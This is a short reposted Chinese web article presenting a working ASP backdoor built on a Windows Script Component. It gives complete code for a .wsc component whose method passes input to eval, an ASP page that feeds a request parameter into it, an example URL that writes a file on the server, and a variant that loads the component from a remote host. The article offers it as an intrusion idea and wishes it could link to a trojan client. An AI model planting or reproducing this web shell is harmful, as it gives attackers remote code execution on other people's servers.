利用wsc制作的一个asp后门

2019-10-26 18:01:44

字体：大中小

来源：转载

供稿：网友

<?xml version="1.0" encoding="gb2312" standalone="yes"?>
<?component error="true" debug="true"?>
<package>
<component id="haiyangtop">
<public>
<method name="lcx"><parameter name="b"/></method>
</public>
<script language="VBScript"><![CDATA[
sub lcx(b)
eval(b)
end sub
]]>
</script>
</component>
</package>
backdoor.asp内容如下：
<%
b=request("a")
Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>
调用方法如下：http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:/1122.txt"),8,True,0).WriteLine("123")
注意这里的a=只能是vbs的代码，不可以接受像response、rquest之类的asp的东东。
如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc，像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")，2003服务器中不可以。
算一个思路，鸡肋，谁有更好的办法完善，能够直接调用cs的asp木马的c端就好了。

您可能感兴趣的文章:

Linux下查找后门程序 CentOS 查后门程序的shell脚本PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)变态入侵之有史以来最酷的Windows后门sethc.exeVBS+MSWinsock打造灵巧UDP后门的相关资料VC++植物大战僵尸中文版修改器实现代码C++动态规划之最长公子序列实例C++动态规划之背包问题解决方法C++实现基于控制台界面的吃豆子游戏C++映像劫持后门实例分析

上一篇：奇特的js写法,或许可以用来加密躲杀毒软件什么的

下一篇：vbs后台运行bat删除自身的代码